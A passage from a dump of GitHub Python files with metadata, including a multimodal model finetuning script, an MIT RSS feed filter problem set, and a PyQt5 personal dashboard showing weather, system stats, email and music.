one.\n\"\"\"\n\nwhile True:\n    arquivo = input('File name: ')\n\n    if arquivo == '':\n        print('Program finished')\n        break\n    else:\n        with 
open(f'{arquivo}.txt') as arq:\n for c in arq:\n print(c)\n","repo_name":"fabriciovale20/Livro-Introducao-a-Python3","sub_path":"Capítulo 9 (Arquivos)/ex009.py","file_name":"ex009.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70993885371","text":"# -*- coding: utf-8 -*-\n# @Author: watcher\n# @Created Time: 2023/7/5 3:30 PM\n# @File: finetune\n# @Email: mlshenkai@163.com\nfrom pyrootutils import pyrootutils\nimport os\n# os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"1,2,3,7\"\nimport sys\nimport wandb\nimport torch\n# import torch.multiprocessing as mp\nimport pathlib\n# from loguru import logger\nimport typing\nimport deepspeed\n\nfrom src.LMBuilder.MLLM.shikra.utils.check_dataset import check_data\nfrom src.test.clip_model_test import test_clip_version\n\nproject_path = pyrootutils.setup_root(\n __file__, project_root_env_var=True, dotenv=True, pythonpath=True, cwd=False\n)\nfrom loguru import logger\nfrom src.LMBuilder.MLLM.shikra.configs.config import prepare_args\nfrom src.LMBuilder.MLLM.shikra.builder import load_pretrained\nfrom src.LMBuilder.MLLM.shikra.utils import print_trainable_params\nfrom src.LMBuilder.MLLM.shikra.data_build import prepare_data, prepare_target_processor\nfrom src.LMBuilder.MLLM.shikra.engine import prepare_trainer_collator\nfrom transformers.deepspeed import HfDeepSpeedConfig\n\ndef main(arg=None):\n cfg, training_args = prepare_args()\n # dschf = HfDeepSpeedConfig(training_args.deepspeed)\n # training_args.overwrite_output_dir = True\n model, preprocessor = load_pretrained(cfg.model_args, training_args)\n # Some ugly codes to inject target_processor into preprocessor.\n # maybe effect model. (e.g. add special token; resize embedding)\n model, preprocessor = prepare_target_processor(model, preprocessor, cfg.model_args, training_args)\n print_trainable_params(model)\n\n # Prepare data_collator\n collator_kwargs = cfg.data_args.collator_kwargs\n trainer_cls, data_collator_dict = prepare_trainer_collator(cfg.model_args, preprocessor, collator_kwargs)\n dataset, compute_metrics = prepare_data(cfg.data_args, cfg.model_args, training_args, preprocessor)\n # test_clip_version(preprocessor[\"image\"], model.model.vision_tower[0])\n\n\n # check_data(dataset[\"train\"], data_collator_dict['train_collator'])\n # Initialize Trainer\n\n trainer = trainer_cls(\n model=model,\n args=training_args,\n tokenizer=preprocessor['text'],\n train_dataset=dataset['train'] if training_args.do_train else None,\n eval_dataset=dataset['validation'] if training_args.do_eval else None,\n compute_metrics=compute_metrics if training_args.predict_with_generate else None,\n **data_collator_dict,\n )\n\n # Training\n if training_args.do_train:\n try:\n if (not training_args.overwrite_output_dir) and list(pathlib.Path(training_args.output_dir).glob(\"checkpoint-*\")):\n train_result = trainer.train(resume_from_checkpoint=True)\n else:\n train_result = trainer.train()\n trainer.log_metrics(\"train\", train_result.metrics) # noqa\n trainer.save_metrics(\"train\", train_result.metrics) # noqa\n trainer.save_model()\n except RuntimeError as e:\n print(f\"got RuntimeError: {e.args}\")\n try:\n print(f\"#### device {training_args.local_rank} summary ####\\n{torch.cuda.memory_summary(training_args.local_rank)}\")\n except Exception as inner_e:\n print(f\"get Exception when show cuda summary: {inner_e.args}\")\n raise e\n finally:\n trainer.save_state() # noqa\n trainer.plot_loss()\n\n # save cfg to 
output_dir\n try:\n output_dir = training_args.output_dir\n pathlib.Path(output_dir).mkdir(parents=True, exist_ok=True)\n cfg.dump(os.path.join(output_dir, \"cfg.py\"))\n except Exception as e:\n logger.warning(f'try to save cfg to output_dir, but get exception {e.args}')\n\n # Keyword arguments for `model.generate`\n gen_kwargs = dict(cfg.data_args.gen_kwargs)\n gen_kwargs.setdefault('use_cache', True)\n # important for use model.generate in batch mode. some model config with wrong special_token_id\n # (e.g. shikra generationConfig set pad_token_id to -1)\n if hasattr(cfg.model_args, 'gen_kwargs_set_pad_token_id') and cfg.model_args.gen_kwargs_set_pad_token_id:\n gen_kwargs['pad_token_id'] = preprocessor['text'].pad_token_id\n if hasattr(cfg.model_args, 'gen_kwargs_set_bos_token_id') and cfg.model_args.gen_kwargs_set_bos_token_id:\n gen_kwargs['bos_token_id'] = preprocessor['text'].bos_token_id\n if hasattr(cfg.model_args, 'gen_kwargs_set_eos_token_id') and cfg.model_args.gen_kwargs_set_eos_token_id:\n gen_kwargs['eos_token_id'] = preprocessor['text'].eos_token_id\n\n # Evaluation\n if training_args.do_eval:\n if hasattr(trainer, '_test_collator') and hasattr(trainer, '_eval_collator') \\\n and trainer._test_collator != trainer._eval_collator: # noqa\n logger.warning('[WARNING!!!] use different collator for eval and test. but do_eval and '\n 'do_predict both use trainer.predict (i.e. only test_collator is used.)')\n eval_results = trainer.predict(dataset['validation'], metric_key_prefix=\"eval\", **gen_kwargs)\n trainer.log_metrics(\"eval\", eval_results.metrics) # noqa\n trainer.save_metrics(\"eval\", eval_results.metrics) # noqa\n trainer.save_prediction(eval_results, file_key_prefix='eval')\n\n # Predict\n if training_args.do_predict:\n predict_results = trainer.predict(dataset['test'], metric_key_prefix=\"test\", **gen_kwargs)\n trainer.log_metrics(\"test\", predict_results.metrics) # noqa\n trainer.save_metrics(\"test\", predict_results.metrics) # noqa\n trainer.save_prediction(predict_results, file_key_prefix='test')\n\n # Multi Predict\n if training_args.do_multi_predict:\n old_compute_metrics = trainer.compute_metrics\n multitest = dataset['multitest']\n multitest = typing.cast(dict, multitest)\n for _idx, (k, item) in enumerate(multitest.items()):\n print(f'processing multitest set {_idx}/{len(multitest)}: {k}')\n _ds = item['dataset']\n _compute_metrics = item['compute_metric']\n _prefix = f\"multitest_{k}\"\n\n trainer.compute_metrics = _compute_metrics\n _pred_results = trainer.predict(_ds, metric_key_prefix=_prefix, **gen_kwargs)\n trainer.log_metrics(_prefix, _pred_results.metrics) # noqa\n trainer.save_metrics(_prefix, _pred_results.metrics) # noqa\n trainer.save_prediction(_pred_results, file_key_prefix=_prefix)\n trainer.compute_metrics = old_compute_metrics\n\n\n# noinspection PyUnusedLocal\ndef _mp_fn(index):\n # For xla_spawn (TPUs)\n main()\n\n\nif __name__ == \"__main__\":\n wandb.init(project=\"llava\", group=\"llava\")\n # import torch.multiprocessing as mp\n # os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\n # mp.spawn(main, args=(), nprocs=3)\n main()\n wandb.finish()\n\n\n","repo_name":"mlshenkai/LMPromptBuilder","sub_path":"src/LMBuilder/MLLM/shikra/pipeline/finetune.py","file_name":"finetune.py","file_ext":"py","file_size_in_byte":6844,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"1661499374","text":"# 6.0001/6.00 Problem Set 5 - RSS Feed Filter\n# Name: Aena Teodocio\n# Collaborators:\n# Time: 
Around 5 hours maybe. \n\nimport feedparser\nimport string\nimport time\nimport threading\nfrom project_util import translate_html\nfrom mtTkinter import *\nfrom datetime import datetime\nimport pytz\n\npunc = string.punctuation\n\n#-----------------------------------------------------------------------\n\n#======================\n# Code for retrieving and parsing\n# Google and Yahoo News feeds\n# Do not change this code\n#======================\n\ndef process(url):\n \"\"\"\n Fetches news items from the rss url and parses them.\n Returns a list of NewsStory-s.\n \"\"\"\n feed = feedparser.parse(url)\n entries = feed.entries\n ret = []\n for entry in entries:\n guid = entry.guid\n title = translate_html(entry.title)\n link = entry.link\n description = translate_html(entry.description)\n pubdate = translate_html(entry.published)\n\n try:\n pubdate = datetime.strptime(pubdate, \"%a, %d %b %Y %H:%M:%S %Z\")\n pubdate.replace(tzinfo=pytz.timezone(\"GMT\"))\n # pubdate = pubdate.astimezone(pytz.timezone('EST'))\n # pubdate.replace(tzinfo=None)\n except ValueError:\n pubdate = datetime.strptime(pubdate, \"%a, %d %b %Y %H:%M:%S %z\")\n\n newsStory = NewsStory(guid, title, description, link, pubdate)\n ret.append(newsStory)\n return ret\n\n#======================\n# Data structure design\n#======================\n\nclass NewsStory(object):\n def __init__(self, guid, title, description, link, pubdate):\n \"\"\"\n Initializes a NewsStory object.\n\n Contains the following attributes:\n self.guid (str): A globally unique identifier for this news story.\n self.title (str): The new story's headline.\n self.description (str): A paragraph or so summarizing the news story.\n self.link (str): A link to a website with the entire story.\n self.pubdate (datetime): Date the news was published.\n \n \"\"\"\n self.guid = guid\n self.title = title\n self.description = description\n self.link = link\n self.pubdate = pubdate\n\n def get_guid(self):\n \"\"\"\n Returns: self.guid\n \"\"\"\n return self.guid\n\n def get_title(self):\n \"\"\"\n Returns: self.title \n \"\"\"\n return self.title\n\n def get_description(self):\n \"\"\"\n Returns: self.description \n \"\"\"\n return self.description\n\n def get_link(self):\n \"\"\"\n Returns: self.link \n \"\"\"\n return self.link\n\n def get_pubdate(self):\n \"\"\"\n Returns: self.pubdate\n \"\"\"\n return self.pubdate\n \n#======================\n# Triggers\n#======================\n\nclass Trigger(object):\n def evaluate(self, story):\n \"\"\"\n Returns True if an alert should be generated\n for the given news item, or False otherwise.\n \"\"\"\n # DO NOT CHANGE THIS!\n raise NotImplementedError\n \n\n# PHRASE TRIGGERS\n\nclass PhraseTrigger(Trigger):\n def __init__(self, phrase):\n \"\"\"\n Initializes a new PhraseTrigger.\n \n phrase (str): A phrase to be used as a news story trigger. \n Each word must be separated by a space.\n \"\"\"\n self.phrase = phrase\n\n \n def is_phrase_in(self, text):\n \"\"\"\n Returns True if the whole phrase is in text. 
False otherwise.\n\n text (str): the text from which to search the phrase trigger from.\n \"\"\"\n phrase = self.phrase.lower()\n mytext = text.lower()\n split_phrase = self.phrase.split() \n\n if len(split_phrase) > 1 and \" \" not in text:\n if text.isalpha():\n return False\n else:\n for i in mytext:\n if i in punc:\n mytext = mytext.replace(i, \" \")\n mytext = ' '.join(mytext.split())\n return mytext == phrase\n\n else:\n text_stripped = mytext.translate(str.maketrans('', '', punc)).split()\n for i in range(len(text_stripped)-len(split_phrase)+1):\n try_text = ' '.join(text_stripped[i:i+len(split_phrase)])\n if try_text == phrase:\n return True\n return False\n\n\nclass TitleTrigger(PhraseTrigger):\n def evaluate(self, story):\n \"\"\"\n Returns True if the phrase is in the story's title. False otherwise.\n\n story (a NewsStory object): the class object from which to search the phrase in.\n \"\"\"\n return self.is_phrase_in(story.get_title())\n \n\nclass DescriptionTrigger(PhraseTrigger):\n def evaluate(self, story):\n \"\"\"\n Returns True if the phrase is in the story's description. False otherwise.\n\n story (a NewsStory object): the class object from which to search the phrase in.\n \"\"\"\n return self.is_phrase_in(story.get_description())\n\n\n# TIME TRIGGERS\n\nclass TimeTrigger(Trigger):\n def __init__(self, time):\n \"\"\"\n Initializes a new TimeTrigger.\n \n time (str): A time to be used as a time trigger. \n Timezone is EST and is in format of \"%d %b %Y %H:%M:%S\". \n Example -> \"3 Oct 2016 17:00:10\"\n \"\"\"\n self.tz = pytz.timezone('US/Eastern')\n converted_time = datetime.strptime(time, \"%d %b %Y %H:%M:%S\")\n converted_time = datetime.replace(converted_time, tzinfo=self.tz)\n self.time = converted_time\n\n\nclass BeforeTrigger(TimeTrigger):\n def evaluate(self, story):\n \"\"\"\n Returns True if the story was published before the given time trigger. False otherwise.\n\n story (a NewsStory object): the class object from which to search the phrase in.\n \"\"\" \n story_time = datetime.replace(story.get_pubdate(), tzinfo=self.tz)\n return story_time < self.time\n\nclass AfterTrigger(TimeTrigger):\n def evaluate(self, story):\n \"\"\"\n Returns True if the story was published after the given time trigger. False otherwise.\n\n story (a NewsStory object): the class object from which to search the phrase in.\n \"\"\" \n story_time = datetime.replace(story.get_pubdate(), tzinfo=self.tz)\n return story_time > self.time\n\n\n# COMPOSITE TRIGGERS\n\nclass NotTrigger(Trigger):\n def __init__(self, t):\n \"\"\"\n Initializes a new NotTrigger. \n \n t : An instance of a Trigger object.\n \"\"\"\n self.t = t\n \n def evaluate(self, story):\n \"\"\"\n Returns the inverted boolean result from the given Trigger.\n\n story (a NewsStory object): the class object from which to search the phrase in.\n \"\"\" \n return not self.t.evaluate(story)\n\n\nclass OrTrigger(Trigger):\n def __init__(self, t1, t2):\n \"\"\"\n Initializes a new OrTrigger. \n \n t1, t2 : Two unique instances of a Trigger object.\n \"\"\" \n self.t1 = t1\n self.t2 = t2\n \n def evaluate(self, story):\n \"\"\"\n Returns True if one (or both) of the result from the given triggers is True.\n\n story (a NewsStory object): the class object from which to search the phrase in.\n \"\"\" \n return self.t1.evaluate(story) or self.t2.evaluate(story)\n\n\nclass AndTrigger(Trigger):\n def __init__(self, t1, t2):\n \"\"\"\n Initializes a new AndTrigger. 
\n \n t1, t2 : Two unique instances of a Trigger object.\n \"\"\" \n self.t1 = t1\n self.t2 = t2\n \n def evaluate(self, story):\n \"\"\"\n Returns True only if both of the results from the given triggers are True.\n\n story (a NewsStory object): the class object from which to search the phrase in.\n \"\"\" \n return self.t1.evaluate(story) and self.t2.evaluate(story)\n\n\n#======================\n# Filtering\n#======================\n\n\ndef filter_stories(stories, triggerlist):\n \"\"\"\n Takes in a list of NewsStory instances.\n\n Returns: a list of only the stories for which a trigger in triggerlist fires.\n \"\"\"\n filtered_stories = []\n for s in stories:\n for trigger in triggerlist:\n if trigger.evaluate(s) == True:\n filtered_stories.append(s)\n return filtered_stories\n\n\n\n#======================\n# User-Specified Triggers\n#======================\n\ndef read_trigger_config(filename):\n \"\"\"\n filename: the name of a trigger configuration file\n\n Returns: a list of trigger objects specified by the trigger configuration\n file.\n \"\"\"\n\n trigger_file = open(filename, 'r')\n lines = []\n for line in trigger_file:\n line = line.rstrip()\n if not (len(line) == 0 or line.startswith('//')):\n lines.append(line)\n\n\n # line is the list of lines that you need to parse and for which you need\n # to build triggers\n \n trig_type = {'TITLE': TitleTrigger, 'DESCRIPTION': DescriptionTrigger,\n 'AFTER': AfterTrigger, 'BEFORE': BeforeTrigger, 'NOT': NotTrigger, 'AND': AndTrigger,\n 'OR': OrTrigger} # dict that maps trigger keywords and corresponding classes\n \n user_trig = {} # user defined trigger dict\n added_trig = [] # trigger list \n\n for i in lines:\n i = i.split(',') # split into list to access indices\n\n if i[1] == 'AND' or i[1] == 'OR': # if current line is defining AND / OR trigger\n user_trig[i[0]] = trig_type[i[1]](user_trig[i[2]], user_trig[i[3]])\n\n\n elif i[0] != 'ADD': # if current line is defining a trigger besides AND / OR \n user_trig[i[0]] = trig_type[i[1]](i[2])\n\n else: # otherwise get the previously defined triggers and add them to trigger list\n for trig in i[1:]:\n added_trig.append(user_trig[trig])\n\n return added_trig\n\n\nSLEEPTIME = 120 #seconds -- how often we poll\n\ndef main_thread(master):\n try:\n triggerlist = read_trigger_config('triggers.txt')\n \n # HELPER CODE - you don't need to understand this!\n # Draws the popup window that displays the filtered stories\n # Retrieves and filters the stories from the RSS feeds\n frame = Frame(master)\n frame.pack(side=BOTTOM)\n scrollbar = Scrollbar(master)\n scrollbar.pack(side=RIGHT,fill=Y)\n\n t = \"Google Top News\"\n title = StringVar()\n title.set(t)\n ttl = Label(master, textvariable=title, font=(\"Helvetica\", 18))\n ttl.pack(side=TOP)\n cont = Text(master, font=(\"Helvetica\",14), yscrollcommand=scrollbar.set)\n cont.pack(side=BOTTOM)\n cont.tag_config(\"title\", justify='center')\n button = Button(frame, text=\"Exit\", command=root.destroy)\n button.pack(side=BOTTOM)\n guidShown = []\n def get_cont(newstory):\n if newstory.get_guid() not in guidShown:\n cont.insert(END, newstory.get_title()+\"\\n\", \"title\")\n cont.insert(END, \"\\n---------------------------------------------------------------\\n\", \"title\")\n cont.insert(END, newstory.get_description())\n cont.insert(END, \"\\n*********************************************************************\\n\", \"title\")\n guidShown.append(newstory.get_guid())\n\n while True:\n\n print(\"Polling . . 
.\", end=' ')\n # Get stories from Google's Top Stories RSS news feed\n stories = process(\"http://news.google.com/news?output=rss\")\n\n # Get stories from Yahoo's Top Stories RSS news feed\n # stories.extend(process(\"http://news.yahoo.com/rss/topstories\")) \n # Uncommented the above due to error from getting description items in Yahoo.\n\n stories = filter_stories(stories, triggerlist)\n\n list(map(get_cont, stories))\n scrollbar.config(command=cont.yview)\n\n\n print(\"Sleeping...\")\n time.sleep(SLEEPTIME)\n\n except Exception as e:\n print(e)\n\n\nif __name__ == '__main__':\n root = Tk()\n root.title(\"Some RSS parser\")\n t = threading.Thread(target=main_thread, args=(root,))\n t.start()\n root.mainloop()\n\n","repo_name":"ateodocio/Google-News-RSS-Feed-Filter","sub_path":"ps5.py","file_name":"ps5.py","file_ext":"py","file_size_in_byte":12251,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"38171118252","text":"# Main.py - Handles the functionality to the gui and grabbing the information nessasary to display the gui fully and correctly\n\nimport sys\nimport random \nimport os\nimport pygame\nimport numpy \n\nfrom pygame import mixer\nfrom mutagen.mp3 import MP3\n\nfrom PyQt5 import QtCore\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QScrollBar, QVBoxLayout\nfrom PyQt5.QtCore import QTimer, Qt\nfrom pyqtgraph import BarGraphItem, plot, ScatterPlotItem, mkBrush\n\nfrom Automation_Functions.Chrono import Chrono\nfrom Automation_Functions.Sky import Sky\nfrom Automation_Functions.Inspire import Inspire\nfrom Automation_Functions.Stats import Stats\nfrom Automation_Functions.Notify import Notify\nfrom Gui.Main_Gui import Ui_MainWindow\n\n\n#? The Starting window state\nWINDOW_IS_MAXIMIZED = False\n\n\nclass Mainwindow(QMainWindow,Ui_MainWindow):\n def __init__(self):\n super(Mainwindow,self).__init__()\n self.ui = Ui_MainWindow()\n self.ui.setupUi(self) \n self.ui.Pages.setCurrentWidget(self.ui.Home_Page)\n \n #? Grabbing needed data from module to display on gui\n Cron = Chrono() # Time data\n Date_Text = Cron.Get_Date()\n Xmas_Countdown_Text = Cron.Days_Till_Xmas()\n\n\n S = Sky() # Weather data\n Weather_Text, Temperature_Text, Feels_Like_Text = S.Fetch_Weather_Data()\n WeatherInfoDict = { 'Clear': {'img':'Gui/icons8-sun-96.png', 'Consensus': \"Wear what you want the weather isn't a problem.\"},\n 'Clouds': {'img':'Gui/icons8-clouds-96.png', 'Consensus': 'Pack a coat just in case the weather might turn for the worse.'},\n 'Drizzle': {'img':'Gui/icons8-rainy-weather-96.png', 'Consensus': 'Pack a coat just in case the weather might turn for the worse.'}, \n 'Rain': {'img':'Gui/icons8-rainy-weather-96.png', 'Consensus': 'Wear a coat, the weather is bad.'},\n 'Mist':{'img':'Gui/icons8-haze-96.png', 'Consensus': 'Wear whatever but prepare for the humidity.'},\n 'Fog':{'img':'Gui/icons8-haze-96.png', 'Consensus': 'Wear whatever but prepare for the humidity.'},\n 'Haze':{'img':'Gui/icons8-haze-96.png', 'Consensus': 'Wear whatever but prepare for the humidity.'},\n 'Snow':{'img':'Gui/icons8-snow-96.png', 'Consensus':'Wear a big coat it is freezing!'}}\n \n #! The order of the elif statements matter. 
\n        # EX: if the <= 60 is first it will always return 60 even if it's below 40\n        if Temperature_Text >= 95:\n            Temp_Consensus = \"Wear VERY light clothing, the weather's sweltering.\"\n        \n        elif Temperature_Text >= 80:\n            Temp_Consensus = \"Wear light clothing, it's hot.\" \n        \n        elif Temperature_Text <= 45:\n            Temp_Consensus = \"Wear VERY heavy clothing, it's freezing.\"\n\n        elif Temperature_Text <= 60:\n            Temp_Consensus = \"Wear heavier clothing, it's cold.\"\n        \n        else:\n            Temp_Consensus = \"Wear what you want, the weather's fair.\"\n        \n        Inspiration = Inspire() # Quote data\n        Quote, Author = Inspiration.Fetch_Inspiration()\n\n        \n        #? Fetching music files and putting it in list\n        Music_Path = r'Music_Folder'\n        self.Banger_Playlist = []\n        for root, dirs, files in os.walk(Music_Path):\n            for file in files:\n                self.Banger_Playlist.append(os.path.join(root,file))\n        \n        \n        Stat = Stats() # System data\n        System_Info, Frequency, Battery, Total_Usage, Cpu_Usage = Stat.Check_System_Info()\n        \n        Notif = Notify()\n        email_data, num_emails = Notif.Fetch_Inbox()\n        # NOTE: fetching marks every email as read, so only call this once you are done with the inbox\n        \n        workout_file = r'Save_Folder\\Workouts_Save_File.txt'\n        note_file = r'Save_Folder\\Notes_Save_File.txt'\n        #? Load text from save files\n        workouts_text = self.Load_File_Text(workout_file)\n        notes_text = self.Load_File_Text(note_file) \n\n        self.ui.Workouts_text_edit.setText(workouts_text)\n        self.ui.Notes_text_edit.setText(notes_text)\n        self.ui.Date_Label.setText(Date_Text) #?Works on a different thread to not freeze gui\n        Time_Text_Update = QTimer(self)\n        Time_Text_Update.timeout.connect(lambda: self.ui.Time_Label.setText(Cron.Get_Time()))\n        Time_Text_Update.start(1000)\n        self.ui.Xmas_Countdown_Label.setText(f\"{Xmas_Countdown_Text} Days 'Till Christmas!\")\n\n        self.ui.Weather_Label.setText(f\"Weather: {Weather_Text}\")\n        self.ui.Temperature_Label.setText(f\"Temperature: {Temperature_Text}\")\n        self.ui.Feels_Like_Label.setText(f\"Feels Like: {Feels_Like_Text}\")\n\n        self.ui.Weather_Status_Pic.setPixmap(QPixmap(WeatherInfoDict[Weather_Text]['img']))\n        self.ui.General_Consensus_Desc.setText(f\"\"\"Based on the weather you should: \n{WeatherInfoDict[Weather_Text]['Consensus']} \\nBased on the temperature you should:\n{Temp_Consensus} \"\"\") \n        self.ui.Quote_and_Author_Label.setText(f\"{Author}: {Quote}\")\n        \n        self.ui.System_Label.setText(f\"System: {System_Info['System']}\")\n        self.ui.Node_Label.setText(f\"Node Name: {System_Info['Node']}\")\n        self.ui.Release_Label.setText(f\"Release: {System_Info['Release']}\")\n        self.ui.Machine_Label.setText(f\"Machine: {System_Info['Machine']}\")\n        self.ui.Processor_Label.setText(f\"Processor: {System_Info['Processor']}\")\n        self.ui.Physical_Cores_Label.setText(f\"Physical Cores: {System_Info['Physical_Cores']}\")\n        self.ui.Total_Cores_Label.setText(f\"Total Cores: {System_Info['Total_Cores']}\")\n        self.ui.Max_Freq_Label.setText(f\"Max Frequency: {Frequency['max_freq']}\")\n        self.ui.Min_Freq_Label.setText(f\"Minimum Frequency: {Frequency['min_freq']}\")\n        self.ui.Current_Freq_Label.setText(f\"Current Frequency: {Frequency['current_freq']}\")\n        self.ui.Battery_Left_Label.setText(f\"Battery left: {Battery['battery_left']}%\")\n        self.ui.Battery_Plugged_In_Label.setText(f\"Battery plugged in: {Battery['battery_plugged']}\")\n        \n        self.ui.Email_1_From.setText(f\"From: {email_data[0]['From']}\")\n        self.ui.Email_2_From.setText(f\"From: {email_data[1]['From']}\")\n        self.ui.Email_3_From.setText(f\"From: {email_data[2]['From']}\")\n        
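# (added) the labels below repeat this wiring for the remaining From, Date, Subject and Message fields.\n        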
self.ui.Email_4_From.setText(f\"From: {email_data[3]['From']}\")\n self.ui.Email_5_From.setText(f\"From: {email_data[4]['From']}\")\n self.ui.Email_1_Date.setText(f\"Date: {email_data[0]['Date']}\")\n self.ui.Email_2_Date.setText(f\"Date: {email_data[1]['Date']}\")\n self.ui.Email_3_Date.setText(f\"Date: {email_data[2]['Date']}\")\n self.ui.Email_4_Date.setText(f\"Date: {email_data[3]['Date']}\")\n self.ui.Email_5_Date.setText(f\"Date: {email_data[4]['Date']}\")\n self.ui.Email_1_Subject.setText(f\"Subject: {email_data[0]['Subject']}\")\n self.ui.Email_2_Subject.setText(f\"Subject: {email_data[1]['Subject']}\")\n self.ui.Email_3_Subject.setText(f\"Subject: {email_data[2]['Subject']}\")\n self.ui.Email_4_Subject.setText(f\"Subject: {email_data[3]['Subject']}\")\n self.ui.Email_5_Subject.setText(f\"Subject: {email_data[4]['Subject']}\")\n self.ui.Email_1_Msg.setText(f\"Message: {email_data[0]['Message']}\")\n self.ui.Email_2_Msg.setText(f\"Message: {email_data[1]['Message']}\")\n self.ui.Email_3_Msg.setText(f\"Message: {email_data[2]['Message']}\")\n self.ui.Email_4_Msg.setText(f\"Message: {email_data[3]['Message']}\")\n self.ui.Email_5_Msg.setText(f\"Message: {email_data[4]['Message']}\")\n \n \n #? Manully adding widgets that can't be added with QT designer\n Notes_text_edit_Scroll_Bar = QScrollBar(self)\n Notes_text_edit_Scroll_Bar.setStyleSheet(\"background : rgb(250,176,5);\")\n self.ui.Notes_text_edit.setVerticalScrollBar(Notes_text_edit_Scroll_Bar)\n \n GraphWidget = plot()\n x = [1, 2, 3, 4, 5, 6, 7, 8]\n Rounded_Cpu_Usage = []\n for item in Cpu_Usage:\n Rounded_Cpu_Usage.append(round(item))\n y1 = Rounded_Cpu_Usage\n BarGraph = BarGraphItem(x = x, height = y1, width = 0.5, brush = mkBrush(250,176,5))\n GraphWidget.setYRange(0,100)\n GraphWidget.setBackground(None)\n GraphWidget.addItem(BarGraph)\n HorizontalLayout = QVBoxLayout() \n HorizontalLayout.addWidget(self.ui.System_Stats_Plots_Title)\n HorizontalLayout.addWidget(GraphWidget)\n self.ui.System_Stats_Plots.setLayout(HorizontalLayout)\n self.ui.System_Stats_Plots_Title.setAlignment(Qt.AlignVCenter)\n \n #? Setting timer for Song function\n self.Song_Bar_Update = QTimer(self)\n self.Song_Bar_Update.timeout.connect(lambda: self.Play_Time())\n \n #? Setting functions for buttons\n self.ui.Home_Button.clicked.connect(lambda: self.ui.Pages.setCurrentWidget(self.ui.Home_Page))\n self.ui.Time_Button.clicked.connect(lambda: self.ui.Pages.setCurrentWidget(self.ui.Time_Reminders_Page))\n self.ui.Weather_Button.clicked.connect(lambda: self.ui.Pages.setCurrentWidget(self.ui.Weather_Page))\n self.ui.Inspirations_Button.clicked.connect(lambda: self.ui.Pages.setCurrentWidget(self.ui.Inspirations_Page))\n self.ui.System_Button.clicked.connect(lambda: self.ui.Pages.setCurrentWidget(self.ui.System_Stats_Page))\n self.ui.Email_Button.clicked.connect(lambda: self.ui.Pages.setCurrentWidget(self.ui.Email_Page))\n self.ui.Close_Button.clicked.connect(lambda: self.close())\n self.ui.Maximize_Button.clicked.connect(lambda: self.Restore_or_Maximized())\n self.ui.Minimize_Button.clicked.connect(lambda: self.showMinimized())\n self.ui.Workout_Save_Button.clicked.connect(lambda: self.Save_Gui_Input(self.ui.Workouts_text_edit,\"Save_Folder/Workouts_Save_File.txt\"))\n self.ui.Notes_Save_Button.clicked.connect(lambda: self.Save_Gui_Input(self.ui.Notes_text_edit,\"Save_Folder/Notes_Save_File.txt\"))\n self.ui.Play_Button.clicked.connect(lambda: self.Play_Song())\n \n \n #? 
Save all text from file to save_data variable\n def Load_File_Text(self,file):\n with open(file,\"r\") as f:\n save_data = f.read()\n return save_data \n\n #? write text from widget to file \n def Save_Gui_Input(self,widget,file): \n contents = widget.toPlainText() \n with open(file,\"w\") as f:\n f.write(contents)\n \n def Restore_or_Maximized(self):\n global WINDOW_IS_MAXIMIZED\n win_status = WINDOW_IS_MAXIMIZED\n if win_status == False:\n WINDOW_IS_MAXIMIZED = True\n self.showMaximized()\n else:\n WINDOW_IS_MAXIMIZED = False\n self.showNormal()\n \n def Play_Song(self):\n if pygame.mixer.get_init():\n if self.ui.Play_Button.isChecked() == False:\n mixer.music.pause()\n self.Song_Bar_Update.stop()\n self.ui.Play_Button.setIcon(QIcon(\"Gui/icons8-play-32.png\"))\n \n elif self.ui.Play_Button.isChecked() == True:\n mixer.music.unpause()\n self.Song_Bar_Update.start(1000)\n self.ui.Play_Button.setIcon(QIcon(\"Gui/icons8-pause-32.png\"))\n \n else:\n pygame.init()\n pygame.mixer.music.set_endevent(pygame.USEREVENT)\n song = random.choice(self.Banger_Playlist)\n song_mutation = MP3(song)\n self.song_length = round(song_mutation.info.length)\n self.ui.Song_Progress_Bar.setMaximum(self.song_length)\n song_title = song.rstrip(\".mp3\").lstrip(\"Music_Folder\\\\\")\n self.ui.Song_Title_Label.setText(song_title)\n mixer.init()\n mixer.music.load(song)\n mixer.music.play()\n self.Song_Bar_Update.start(1000)\n self.ui.Play_Button.setIcon(QIcon(\"Gui/icons8-pause-32.png\"))\n \n def Play_Time(self):\n #? grab time in seconds rounded\n current_time = round(mixer.music.get_pos() / 1000)\n self.ui.Song_Progress_Bar.setValue(current_time)\n #? Check for music ending event and queue another song in responce \n for event in pygame.event.get():\n if event.type == pygame.USEREVENT:\n self.Song_Bar_Update.stop()\n pygame.mixer.quit()\n self.Play_Song()\n self.Song_Bar_Update.start(1000)\n \ndef app():\n os.system('cls')\n app = QApplication(sys.argv)\n win = Mainwindow()\n \n #? 
Adjusting window settings\n    win.setWindowTitle(\"D.E.A.T.H - Developer Environment Automation & Task Handler\")\n    win.setWindowIcon(QIcon('Gui/icons8-headstone-100.png'))\n    flags = QtCore.Qt.WindowFlags(QtCore.Qt.FramelessWindowHint)\n    win.setWindowFlags(flags)\n    \n    win.show()\n    \n    sys.exit(app.exec_())\n\nif __name__ == \"__main__\":\n    app()\n\n\n\n\n","repo_name":"ThatNerd404/D.E.A.T.H","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":13069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7747406490","text":"SA=0\nSD=0\nfor i in range(1,200):\n    n=int(input(\"\"))\n    if n==0:\n        break\n    elif n<0:\n        SA=SA+1\n    else:\n        SD=SD+1\nprint(SD,\"positive numbers\")\nprint(SA,\"negative numbers\")","repo_name":"quangthanhqt264/project","sub_path":"Chuong3/P2/CC3.11.py","file_name":"CC3.11.py","file_ext":"py","file_size_in_byte":175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4657427764","text":"from os.path import abspath\r\nfrom typing import List\r\nimport discord\r\nfrom discord import channel\r\nfrom discord import client\r\nfrom discord.voice_client import VoiceClient\r\nfrom discord import guild\r\nfrom discord import 